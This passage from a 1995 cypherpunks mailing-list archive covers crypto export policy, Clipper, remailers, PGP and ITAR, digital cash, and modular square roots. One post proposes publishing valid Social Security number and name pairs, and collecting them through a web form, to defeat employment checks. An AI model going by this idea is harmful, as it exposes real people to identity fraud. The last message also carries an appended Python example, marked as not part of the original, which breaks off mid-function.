   proposal -- the latest version of a measure revealed more
   than three years ago but subsequently reconsidered in the
   face of industry opposition -- unexpected divisions emerged
   from the last-minute, scattershot lobbying.

   The splits are developing at a crucial moment, with the
   Government's interagency task force also apparently divided
   between those favoring maximum governmental access to
   communications and those who support a loosening of export
   restrictions. Most industry executives had hoped to present
   a united front in favor of the more liberal position -- a
   goal that now appears to be in jeopardy.

   The two major groups sending letters to Vice President Al
   Gore, the Administration's point man on technology issues,
   were a group of computer hardware manufacturers and a group
   of the largest makers of software.

   In a letter sent to the Vice President last Thursday, eight
   executives, including James Treybig, chairman of Tandem
   Computers Inc.; Gil F. Amelio, chairman of the National
   Semiconductor Corporation; Edward McCracken, chairman of
   Silicon Graphics Inc.; Eugene Shanks Jr., president of the
   Bankers Trust New York Corporation, which conducts
   international electronic commerce, and Stephen T. Walker,
   chairman of Trusted Information Systems, urged that the
   Government immediately establish a new standard to control
   the export of technology that is used to encode
   communications, so that outsiders cannot tap in.

   A day later, however, a group of software publishers,
   including William H. Gates, chairman of the Microsoft
   Corporation; Jim P. Manzi, president of the Lotus
   Development Corporation and a senior vice president of
   I.B.M., Robert Frankenberg, chairman of Novell Inc.; Mark
   B. Hoffman, chairman of Sybase Inc., and Carol Bartz,
   chairwoman of Autodesk Inc., wrote arguing that the
   possible restrictive regulations that may soon be offered
   by the Government would fail to remove the current
   obstacles that keep American companies from competing in
   lucrative international markets.

   Many off-the-shelf programs cannot be marketed abroad
   without alteration under current regulations. For example,
   before American publishers can sell the popular Lotus Notes
   program abroad, they must replace its encoding system with
   a weakened version so that foreign communications can be
   monitored by American intelligence agencies. These
   restrictions date to the 1970's when advanced computer
   technology was treated as the equivalent of military
   technology and subject to the same strict controls.

   The software publishers have been able to sell their highly
   effective communications encoding products in this country,
   while sales abroad, they contend, have been hurt. Their
   letter also said that although the Administration agreed
   last year to work with industry toward a compromise, "there
   has been only minimal consultation with the software
   industry with respect to basic questions."

   "We're worried the Government is about to announce the son
   of Clipper," said Robert W. Holleyman 2d, president of the
   Business Software Alliance, referring to the Government's
   original proposal for changing the standard. This proposal,
   released in April 1993, would have replaced the cold
   war-era restrictions with a coding standard that allowed
   sales of strong encryption programs, but would have given
   United States law-enforcement agencies access to all
   communications through a back door with a numerical key.

   "The Administration has been trying to resolve how to keep
   U.S. companies competitive, but there remain individuals in
   the Government who want to do anything they can to slow the
   proliferation of new encryption technologies," Mr.
   Holleyman said.

   In April 1992, the Administration proposed a hardware-based
   system for protecting the privacy of telephone calls and
   computer data transmissions. The standard, known as the
   Clipper Chip, included a special "backdoor" that would
   permit law-enforcement officials to listen to conversations
   and monitor data exchanges.

   The original Clipper system called for a two-part key for
   decoding scrambled conversations. The two parts of the key
   -- actually two large numbers -- were to be held by two
   independent Government agencies. Under the plan, when a
   law-enforcement agency had a warrant to listen to a
   conversation encoded by Clipper, it would obtain the keys
   from the separate agencies. By merging the keys, it could
   obtain a key that would unlock the coded conversation.
             
   The Clipper proposal met with angry opposition both from
   advocates for civil liberties, who argued it would
   undermine the right to privacy, and by high-technology
   executives who said Clipper would be unacceptable for
   foreign users who would not want their conversations to be
   readable by the United States Government.

   The announcement of the new proposal may be imminent. Two
   trade associations, the Software Publishers Association and
   the American Electronic Association, are planning a
   conference on cryptography policy for Friday.

   Several people familiar with Administration policy
   discussions said the Government had until recently remained
   divided and that the director of the Federal Bureau of
   Investigation, Louis J. Freeh, has been the most vocal
   advocate of placing strict limits on any use of
   unsanctioned encryption technology.

   After the bombing of the Federal building in Oklahoma City,
   the F.B.I. circulated a proposed antiterrorism bill on
   Capitol Hill that would have banned even the domestic use
   of coding software except for systems approved by the
   Government.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 14 Aug 95 06:47:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Data Secrecy Rift
In-Reply-To: <199508141329.JAA02054@pipe4.nyc.pipeline.com>
Message-ID: <9508141346.AA22758@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes:
>    In a letter sent to the Vice President last Thursday, eight
>    executives, including James Treybig, chairman of Tandem
>    Computers Inc.; Gil F. Amelio, chairman of the National
>    Semiconductor Corporation; Edward McCracken, chairman of
>    Silicon Graphics Inc.; Eugene Shanks Jr., president of the
>    Bankers Trust New York Corporation, which conducts
>    international electronic commerce, and Stephen T. Walker,
>    chairman of Trusted Information Systems, urged that the
>    Government immediately establish a new standard to control
>    the export of technology that is used to encode
>    communications, so that outsiders cannot tap in.

This doesn't say very much. What sort of "new standard" for crypto export
control did they urge ?  Also, if you'll pardon my naivete, how does TIS
stand to benefit from such restrictions ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: theilman@umsmed.edu (Gary Theilman)
Date: Mon, 14 Aug 95 08:42:11 PDT
To: cypherpunks@toad.com
Subject: Re: My pseudo-anonymous dream list
Message-ID: <9508141541.AA03333@fiona.umsmed.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>There are, however, a great number of internal improvements that could be 
>made that would both improve user-end usefulness AND improve overall 
>security.

I use Private Idaho, Eudora, and an account on alpha.c2.org.  Let's see how
the wishlist compares with this setup.

>1)  Multiple Remailers:
>I'd like to see multiple (maybe >12) remailers that utilize the same
>database, upgraded by batched processes once or twice a day or "broadcast"
>realtime to all the remailers in the web (probably the latter is better). 

Probably could be done by sharing the alpha.c2.org database to other remailers.
I don't see any security problems with this as long as people use encrypted
remailing blocks.


>2)  Encrypted Databases:
>Any properly designed 'nym' server should have a totally 
>encrypted database.

alpha.c2.org doesn't require this, but a smart user will arrange to have
their reply block encrypted with the key of several different remailers.

>3)  Limited ID lifetime
>Another failing, IMHO, with penet.fi is that ID#'s have an unlimited 
>lifetime.

Is this really a problem?  Makes sense from a housekeeping point of view,
though.

>4)  Chained Mailings
>Because you have many remailers operating, all messages should be randomly
>chained through them. 

You can set up your reply block for chaining, although it isn't random.

>Before a chaining is done, the remailer should ping the target remailer to
>make sure it is up, so that mail isn't sitting in the queue.  

Hmmm.   May be a problem if you are using latent time.

>All chained mail should also be encrypted.

alpha.c2.org can do this

 
>5)  Encryption/Signature Validation
>Any message that is emailed PGP signed should be validated by the remailer
>(with the User having to email in their public key as part of the
>registration process, if they so choose, or remailers can use the
>keyserver). 

Does this present a security problem, perhaps in conflict with suggestions #2?


>6)  Two-way

I can do this now, although sometimes the reply is delayed a few days.


>7)  Option Validation
>In order to change any of the options on your ID (ie, the expiration date
>of your ID, or to expire it immediately, or to set the number of "hops" 
>you want to chain through), you should have to submit a PGP Signed command
>message.  Then, similar to a LISTSERV that confirms subscriptions and
>unsubscriptions, a message is sent back asking you to "ok" these changes. 
>This return message is sent as PGP encrypted email to your public key. 
>When you decode it, you are given a, say, 10digit code string that you need
>to mail back to confirm the changes. If you don't, it doesn't.  

A password is required for alpha.c2.org to make changes.  And any message 
containing command changes must be encrypted with the remailer's key.


>8)  Robust Web of Remailers
>Remailers come and go daily.  Any pseudo-anonymous remailer web needs to
>be able to handle that fact.  Thus, a mechanism needs to be put into place
>to allow for easy adding of a new machine (if it's easy, more people will
>do it) with minimal maintenance.  In addition, if a remailer disappears
>(say, because somebody caught wind of it and ordered the student to turn
>it off :-), the rest of the remailer web needs to be able to survive.  Of
>course, that particular address will be dead, but with appropriate FAQs
>posted around, people should be able to quickly find another address that
>uses the same database. 

I regularly check the pinging service at remailer-list@kiwi.cs.berkeley.edu
to do this.


>
>9)  Proper PR

Agreed.


GREAT SUGGESTIONS!  I think that alpha.c2.org comes closest to fulfilling
your wish list, although it has several problems.  The greatest problem is
ease of set up.  It took me several tries before I figured out how to set up
and send an encrypted reply block in such a way that it could not be traced
back to me.  It also suffers from tremendous overload, much like
anon.penet.fi.  As a result, it can be slow.

I would add a few more suggestions of my own to your wishlist.

11)  Seamless integration with existing mail programs, such as Eudora.

12)  Notification that your message has been received (I'm not sure how to
do this and maintain anonymity)

13)  Ability to handle very large encrypted files (binaries).

14)  Perhaps increasing security by breaking messages into several parts,
routing them through different chains, and reassembling them just prior to
transmission to recipient.


Keep up the good work!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC+JEFQVGHmq7kxdAQEWOQQAvKO3kZp6uMoYdRgEohWFk8PpPdw27iSB
si2hFqZOm72581sEo2OXCmCSM9pn193XSOSqZJ1yYALi1OfQ2UrzuNbpteyE2rP8
koz72XU7OIs+8eLJ4+lp02gCq4/0no/simB9fWO+cAIp5zWB30jaHdp2lca37Z8Y
7vuiMuT3Pxc=
=4X+7
-----END PGP SIGNATURE-----
Gary D. Theilman, Pharm.D.
University of Mississippi School of Pharmacy
Department of Clinical Pharmacy Practice

Finger for PGP Public Key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 14 Aug 95 08:16:34 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508141515.LAA00956@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 8/10/95 -0700, Timothy C. May wrote:

>Now clearly this strategy will be welcomed by many. It's hard to argue
>against children and against the "protection of children." Arguing the
>Constitutional side is tough when "the children" are at issue. 

I don't know, I find it pretty easy.  All you have to do is say "The
Slickster thinks that kids should be able to get government condoms and
government abortions at will and should be able to copulate with abandon --
so what's a few cigarettes?"  I thought Heillary said that children had a
right to sue their parents?  If the children's rights movement wants all of
the above, it has to allow them to smoke and avoid vaccinations as well.  If
it's wrong to interfere with kids' autonomy in sex and litigation, then it's
wrong to interfere with their autonomy in guns and smokes.

I always say that I want to reduce State power "for the children."  Putting
a really commie-liberal accent on the phrase.  It bugs the opposition.  It's
a null argument since you can argue in favor of anything "for the children."

During the '92 campaign, Clinton said "I wake up every morning and worry
about your children."  I said in one of my .sigs, "Please don't worry about
my children because if you do you might feel compelled to do something about
them and the ensuing fire fight could cause substantial collateral damage in
the neighborhood."

>The potential crypto relevance? Look for arguments about limiting access to
>strong crypto to be more heavily focussed on "pedophiles" and
>"pornographers." Look for calls to have a national I.D. card--which serves
>many State-needed purposes (and I don't mean in terms of Revelations). A
>national I.D. card could then be tied in to GAK/escrow systems.

The current national ID push is for illegal immigration control purposes.
The last national ID push was under the Health Security Act.  They are
certainly anxious to get internal passports, aren't they.  Luckily, as long
as other nations within our passport control zone (like Canada and Mexico)
don't have national ID cards, they will be easy enough to dodge for non work
purposes.

The Jordan Commission recommendations (calling for SS#/True Name matches as
a condition for employment) can be defeated by a direct action program of
publishing valid SS#/True Name matches.  If you get enough valid pairs out
in the public domain (still legal to do), illegal aliens and citizens who
prefer not to participate in the system can use them.  That would corrupt
the control system.

I need practice with HTML forms and databases.  Perhaps that would be a good
project.  Writing a simple form to collect and store SS#/Name submissions
from the general public.

DCF

"Government is not healthy for children and other living things."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 14 Aug 95 03:49:09 PDT
To: cypherpunks@toad.com
Subject: Australia crypto ill news: pointers
Message-ID: <20465.9508141048@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The following URL was posted by Ross Anderson (the author of the
article quoted in RISKS):

http://commerce.anu.edu.au/comm/staff/RogerC/Info_Infrastructure/Orlowski.html

This is a pointer for the full text of the Orlowski paper (the cause
of much discussion on the future of crypto in Australia).

Also Roger Clark's home page contains lots of interesting references
for crypto policy, privacy, some info on CFP, etc, very interesting
reading I found:

	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 14 Aug 95 04:12:27 PDT
To: cypherpunks@toad.com
Subject: votelink - some discussions on Phil Z & ITAR
Message-ID: <20548.9508141111@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



A short time ago on cpunks someone posted this pointer:

	http://www.votelink.com/

as there was a vote and associated discussion forum being offered on
the subject of Phil Z, the (somewhat leading - incorrectly leading)
question:

 "Should Phil Zimmermann be prosecuted for allowing release of his PGP
  encryption program on the Internet?"

(The comment on leading question being prompted of course by the fact
that Phil did not himself export PGP, nor put it on the internet, nor
even put it on US BBSes.  The way I understand the story was that a
friend of Phil's posted the code to US BBSes, and that an unknown 3rd
party posted it from there to the Internet.  He is being investigated
for "making PGP available in a form in which it could be exported",
something different to what is implied by the question.  In this light
I find it difficult to understand how he could be held to have
"allowed its release on the Internet", something which even the State
Department investigation is not I think accusing him of.  Several
people pointed this out in the discussion forum.  A more accurate
phrasing would perhaps have been:

 "Should Phil Zimmermann be persecuted for writing PGP?"

but then that is no doubt biased in the opposite direction.)

An interesting vote in any case, and the balance so far is:

YES: 000,172 | ABSTAIN: 000,096 | NO: 001,508

The abstainers I think could be partly explained by the worry that the
question was leading or incorrect, as this opinion was voiced in the
discussion forum.

Also an interesting thread was generated in the (WWW hosted)
discussion forum about the legal problems implied by me posting these
two snippets of code (which I posted to the forum earlier):


#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)


------------------ PGP.ZIP Part [024/713] ------------------- 
M!4HD";*K"$$=/!<29+_A`K9C/2+@"4<,5G(N0M`47K#'`T6"[&>M83PL=@FR
8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/ 
------------------------------------------------------------- 


(hmm it seems that their WWW conversion chopped out some parts of it
presumably due to it containing < and > symbols, so perhaps their
fears were even further unfounded).  

They were alarmed by the implication that their WWW server now
contained PGP code which they did not feel qualified to judge the
implications, or correctness of.  This prompted the posting to the
forum of a rather worried sounding disclaimer by a votelink
representative, to the effect that they were abiding by the Prodigy
ruling, and so felt unable to remove the offending piece of ITAR
breakage, and yet felt rather uncomfortable with its presence.

I hastened to explain (after a certain cpunk kindly drew my attention
to the discussion which I had neglected to check out after posting the
1st message) that the same dilemma applies to numerous other forums,
such as USENET news distribution sites, sci.crypt archives, cpunks
archives, etc, etc.

Generated some interesting discussion anyway.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 09:15:38 PDT
To: cypherpunks@toad.com
Subject: COS_sak
Message-ID: <199508141615.MAA29588@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-14-95. NYPaper [a mote for Futplex's panoptic biblio]:


   "Dissidents Use Computer Network to Rile Scientology."

      The Church of Scientology is battling a band of on-line
      dissidents who have used the Internet to mail out
      globally its secret scriptures. On Saturday, as a result
      of a copyright infringement lawsuit, US marshals seized
      the computer of a former church employee who had
      electronically posted a 13-page text that he said was
      available in court records.

      Helena K. Kobrin, a lawyer for the church, said: "There
      are people out there who somehow think the Internet has
      created a new medium where all the rules go away, and
      it's not true. Things happen faster on the Internet, and
      we're going to keep up."


   COS_sak (about 7K)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 09:17:10 PDT
To: cypherpunks@toad.com
Subject: CEL_tic
Message-ID: <199508141617.MAA29734@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-14-95. NYPaper:


   "Israelis and Others Feel the Sting of a Cellular Phone Bug."

      A software bug inside the Alpha digital phone of
      Motorola has demonstrated an area of vulnerability in
      the growing web of digital communications systems -- and
      prompted Motorola to issue a worldwide recall. Motorola
      wound up asking 150,000 Alpha users in six countries to
      return the phones to have the software changed. The
      Alpha adheres to an emerging standard for digital
      cellular telephones called time division multiple
      access, or T.D.M.A. The bug caused the phone to lock on
      to one channel and stay there indefinitely.

      "There are tremendous risks as soon as you put something
      in software," said Peter Neumann, a computer security
      specialist with SRI International. The cellular industry
      "has foisted a disastrously insecure technology on the
      public," he said.


   CEL_tic (about 7K)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 14 Aug 95 12:24:33 PDT
To: cypherpunks
Subject: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <9508141924.AA00272@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: sbb@well.com (Stewart Brand)
To: telecom_ir@rand.org
cc: Frank Fukuyama <fukuyama@rand.org>
Subject: Re: Cyberspace Security and the Internet Metaphor
Date: Sun, 13 Aug 95 12:12:46 PDT
From: David Ronfeldt <ronfeldt@rand.org>

The discussion has assumed a familiar ring, as though the responsibilities
for and answers to cyberspace security lie in the usual two realms or
sectors: government or market, public or private.

Is that the only range of choice?  It pretty much has been for decades.
But I still say there is a new realm/sector emerging out there now, which,
for lack of a more acceptable term, amounts to what Drucker terms the
social sector.

        "the post-capitalist polity needs a 'third sector,' in addition
        to the two generally recognized ones, the 'private sector' of
        business and the 'public sector' of government.  It needs an
        autonomous social sector." (Drucker 1993)

Many Internet-related NGOs (like EFF) and individuals (like Zimmermann)
fall in this sector.  They aren't government or market; they are nonstate,
nonprofit actors.  And besides just having a lot to say about cyberspace
security issues, they have some roles to play--e.g., distribution of
encryption techniques, watchdog and warning activities.  For now, these
roles are minor.  But my guess is that they will get increasingly bigger,
probably in ways we do not yet foresee.

Whether their roles will soon be as significant as those of government and
market actors is less important than whether they are, and increasingly
will be, contributing something significant to the overall design mix.  My
presumption is that advanced societies develop mixes that distribute "the
solution" across various realms and their actors.

What I would like to know and discuss--and I ask you all--is what these
nonstate, nonprofit actors are doing at present that amounts to their
being part of the solution(s)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Mon, 14 Aug 95 03:41:24 PDT
To: cypherpunks@toad.com
Subject: Changes in Operation..
Message-ID: <199508141041.MAA10228@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


	ATTENTION: The anonymous remailer operators at vishnu.alias.net
and spook.alias.net have decided to activate the reordering option on both
the Type-I (original cypherpunk) and Type-II (MixMaster). This means that
there will be at least 5 messages in the outbound queue and they will be
delivered randomly. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 14 Aug 95 12:14:20 PDT
To: 74774.3663@compuserve.com
Subject: Re: An article for Wired magazine
In-Reply-To: <950814181048_74774.3663_EHL147-1@CompuServe.COM>
Message-ID: <199508141914.NAA16529@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text




-----BEGIN PGP SIGNED MESSAGE-----

> First of all, digital money can take various forms.  Existence on a hard 
> drive is one of those forms.  But, it is also possible to have digital money 
> on a card-based platform. Mondex in the UK currently has official government 
> units of account digitally represented for their Mondex card trial in 
> Swindon.  They have also announced that in the future this card will hold up 
> to five "official" currencies.  Furthermore, they make no secret about the 
> fact that this digital money is ideally suited to transfer on the Net.  Visa 
> and Mastercard are both working on stored-value cards which will also 
> digitize official currencies.  CyberCash has also announced plans for an 
> electronic token which will most likely represent an official currency.  
> Others will announce soon.


I'd like to go on record as stating that all of these other systems pretty
much suck.  Mondex, for example, actually stores non-crypto messages of the
type "Hi there I represent one hundred Belgian crowns" in its cards, so if
you can hack the "front-door" security (possibly with physical hacking of the
card) and convince a Mondex card that your PC is another Mondex card you can
transfer infinite money to it.  (Well, I suppose you wouldn't be able to
transfer more than 2^64 units of currency or some such limit, but you get the
idea.)


Contrast this with DigiCash's scheme in which each cyberbuck is
cryptographically unforgeable.


Most of the other companies have similarly weak security.  Many of them are
not offering any new technology at all, but are simply offering to transport
your credit card number for you, encrypted, over the net.


Furthermore none of DigiCash's competitors, as far as I have been able to
learn, offer any kind of anonymity the way DigiCash does.  The closest they
come is "confidentiality".  Yeah-- right.  I can get the same offer from the
Ministry of Truth.


Finally, be aware that e-cash can be put onto a smart card just as well as
on a magnetic disk.  DigiCash is actually in the process of developing and/or 
marketing smart cards that hold such things as toll tokens for toll roads and
civic credits for coffee houses in Europe.  See their home page for more
detailed (and probably more accurate) info.


Source of facts behind these opinions:  Perusing the web pages of the
principals.


 DigiCash home page http://www.digicash.com/
 FIRST VIRTUAL Holdings Incorporated http://www.fv.com/
 Mondex Home Page http://www.mondex.com/mondex/home.htm
 CyberCash, Inc. Home Page http://www.cybercash.com/
 CommerceNet Home http://www.commerce.net/
 RSA Data Security, Inc.'s Home Page http://www.rsa.com/
 Net1 Home Page http://www.netchex.com/
 Electronic Commerce http://www.zurich.ibm.ch/Technology/Security/extern/ecommerce/
 The NetCheque(SM) system http://nii-server.isi.edu:80/info/NetCheque/
 NetMarket Homepage http://netmarket.com/nm/pages/home
 Downtown Anywhere - Front Street http://www.awa.com/
 Internet Shopping Network http://www.internet.net/
 Cash, Tokens, etc on NII http://www.cnri.reston.va.us:3000/XIWT/documents/dig_cash_doc/ToC.html
 NetBill Project Home Page http://www.ini.cmu.edu/netbill/
 NetMarket Homepage http://netmarket.com/nm/pages/home
 NexusBucks http://www.c2.org/nexbucks/
 Economics and the Internet http://gopher.econ.lsa.umich.edu/EconInternet.html
 Security First Network Bank, FSB http://www.sfnb.com/
 Commerce on the Internet http://home.netscape.com/newsref/std/credit.html
 A History of Money http://www.ex.ac.uk/~RDavies/arian/llyfr.html
 Wenbo Mao's Presentation http://www.hpl.hp.co.uk/projects/vishnu/main.html
 Internet Casinos http://www.casino.org/
 The E-cash Market http://www.c2.org/~mark/ecash/ecash.html

  

> Stand-by though:  governments and central banks will do everything in their
> power to discourage and prevent this for the power to issue and coin money is
> one of THE most cherished privileges of the Crown !


...and it seems like the first step that they are taking is sanctioning 
inferior, less secure, privacy-decreasing technologies over DigiCash's superior
alternative.


And so it goes...


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMC+gSPWZSllhfG25AQHe+gQAhiPQ8GN+cg4Q6lLe6c8UQovOVN301lop
tAthnw7qbLDY/dKItCy9AzImDGn2WFTwx3i+nouWbDSWwGUw0Zlc6ajdRlCviX9a
BihtvGJaaujxv13ERI6jjmmfkvbctDfqUrDvrgjQB/0kOhSxt5VTkA2tNdzGiEK9
4EA3f+0Cah0=
=cJy2
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 14 Aug 95 13:24:49 PDT
To: "cypherpunks@toad.com>
Subject: Get 1/3 net of 900-CAN-MY0B
Message-ID: <199508142024.NAA27382@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Buy ads for The Agorist Institute's new privacy information
audiotext distribution line (aka 900-number), and get 1/3
of the income above strictly defined costs for TeleConnect
and MCI.

After computing the service bureau and MCI take, it looks 
like we'll have to charge 1.95 (or 1.99 more likely) per 
minute if more than half of the money is to be available for
a three way split. Right now I'm reading a script on a 
low audio volume tape player at 99 cents per minute.

The three ways are 1/3 to Lon Weber, freedom4@aol.com, 
the owner of the 900#, 1/3 to J. Kent Hastings, 
zeus@pinsight.com, Assistant Director of The Agorist Institute, 
the "sponsor" of the line, and 1/3 to an advertiser.

If more than one advertiser gets involved, we can assign and pay
for calls in defined territories. If you buy ads in Colorado, you'd 
get 1/3 of the net from Colorado calls. 

Or if just a few participate with nationwide print, radio, or video
infomercials, we can assign extension numbers, which are 
automatically tallied by TeleConnect, to identify who is to be paid.

Of course, one single investor willing to finance a complete ad 
campaign could use these techniques to select the most 
profitable approaches.

We have the line, 1-900-CAN-MY0B, and it is already approved.
The "MIND YOUR 0WN BUSINESS" audiotext program. 
1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
      Note the zero digit, not the letter "O."

   "The Feds say you can't have privacy, but we say you 
      CAN 'Mind Your 0wn Business!'"

Help get it going, so we can make a dollar and provide useful
privacy news and techniques to the public. A 900# doesn't have 
the printing and postage costs of a newsletter, and the listener
doesn't need to use a credit card or write a check for a 
subscription.

I'm also willing to give 1/2 of my 1/3 (=1/6) for monthly professional 
audio production.

Send e-mail to me at zeus@pinsight.com for more information.

Kent
--
J. Kent Hastings, Assistant Director of The Agorist Institute
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 14 Aug 95 05:23:19 PDT
To: samman@cs.yale.edu
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <9508141212.AA01243@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> >Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
> >and 8^2 mod 35 == 29...  You should go take your number theory class!
> 
> Definitely. Is there an easy way to get from the 29 to the 8?  I can see how
> it goes
> the other way, but what I didn't see was how, if given 29, I could get the
> 8? (Euclid's?)


You can get the square root mod p (p prime) easily, if p+1 is divisible by 4.


You (should) know that  x ^ (p-1) equals 1 mod p for every given x > 0.

Therefore  x ^ ( (p-1)/2 ) is either +1 or -1  mod p.


Now you have a given  x^2 and want to find x (one of the two, there are two..)

 
 ( x^2 ) ^ ((p+1)/4)  =   x ^ (  (p+1)/2 )  =  x * x ^( (p-1)/2 ) = +/- x .

If p+1 is not divisible by 4, it's a little bit more difficult...




In your example, 35+1 is luckily divisible by 4.  But this doesn't help,
because 35 is not a prime.  35 = 5*7 , you can use the Chinese remainder and
find the root mod 5 and the root mod 7. 7+1 is divisible by 4, you can use the trick:

( 8 ^ 2 ) ^ 2 mod 7 =  +/- 1.   (which is correct since 8 = 1 mod 7);

     +1 and -1 are the roots of (8^2) modulo 7.




Modulo 5 we can't use the trick, but we guess the roots of (8^2) = 4 mod 5 as
  2 and 3.




Back to the main problem: You want to have the root of (8^2) mod 35. 

We found the roots  1 and 6 as roots of  (8^2) mod 7
and      the roots  2 and 3 as roots of  (8^2) mod 5.



Now solve the Chinese remainder for each possible pair (1,2), (1,3), (6,2), (6,3),
and you get the _four_ roots of (8^2) mod 35. Two of them will be 8 and -8, and there
are another two.

BTW: This is one way to do a mental coin flipping.  

 


Hadmut :-)
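
The procedure in the message above, worked through in Python as an added example (not part of the original post): the (p+1)/4 shortcut for primes with p+1 divisible by 4, Tonelli-Shanks swapped in for the "more difficult" case instead of guessing, and the Chinese remainder step that yields all four roots of 29 mod 35. Function names are this example's own; `factor_from_roots` shows the property that makes the four roots usable for coin flipping: two roots that are not negatives of each other reveal a factor of the modulus.

```python
# Added example: square roots modulo a prime and modulo n = p*q.
# Function names are this example's own. Requires Python 3.8+ (pow(x, -1, m)).
from itertools import product
from math import gcd


def tonelli_shanks(a, p):
    """One square root of a quadratic residue a modulo an odd prime p.
    Covers the case p % 4 == 1, where the (p+1)/4 shortcut does not apply."""
    q, s = p - 1, 0
    while q % 2 == 0:                          # write p - 1 = q * 2^s, q odd
        q //= 2
        s += 1
    z = 2
    while pow(z, (p - 1) // 2, p) != p - 1:    # smallest quadratic non-residue
        z += 1
    m, c = s, pow(z, q, p)
    t, r = pow(a, q, p), pow(a, (q + 1) // 2, p)
    while t != 1:
        i, t2 = 0, t
        while t2 != 1:                         # least i with t^(2^i) == 1
            t2 = t2 * t2 % p
            i += 1
        b = pow(c, 1 << (m - i - 1), p)
        m, c = i, b * b % p
        t, r = t * c % p, r * b % p
    return r


def sqrt_mod_prime(a, p):
    """Both square roots of a modulo an odd prime p as a sorted tuple,
    or () when a is not a quadratic residue."""
    a %= p
    if a == 0:
        return (0,)
    # Euler's criterion: a^((p-1)/2) is +1 for residues, -1 otherwise.
    if pow(a, (p - 1) // 2, p) != 1:
        return ()
    if p % 4 == 3:
        r = pow(a, (p + 1) // 4, p)            # the shortcut from the message
    else:
        r = tonelli_shanks(a, p)
    return tuple(sorted((r, p - r)))


def crt_pair(r1, m1, r2, m2):
    """The x in [0, m1*m2) with x = r1 (mod m1) and x = r2 (mod m2),
    for coprime moduli m1 and m2."""
    inv = pow(m1, -1, m2)
    return (r1 + m1 * ((r2 - r1) * inv % m2)) % (m1 * m2)


def sqrt_mod_pq(a, p, q):
    """All square roots of a modulo p*q (p, q distinct odd primes):
    one Chinese-remainder solution per pair of roots mod p and mod q."""
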